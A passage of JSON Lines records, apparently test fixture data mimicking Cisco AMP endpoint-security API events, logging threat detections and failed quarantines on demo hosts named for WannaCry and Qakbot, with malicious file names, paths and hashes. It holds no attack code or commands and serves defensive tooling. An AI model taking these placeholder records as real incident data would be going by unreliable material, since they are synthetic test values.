disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt 
Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05
b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
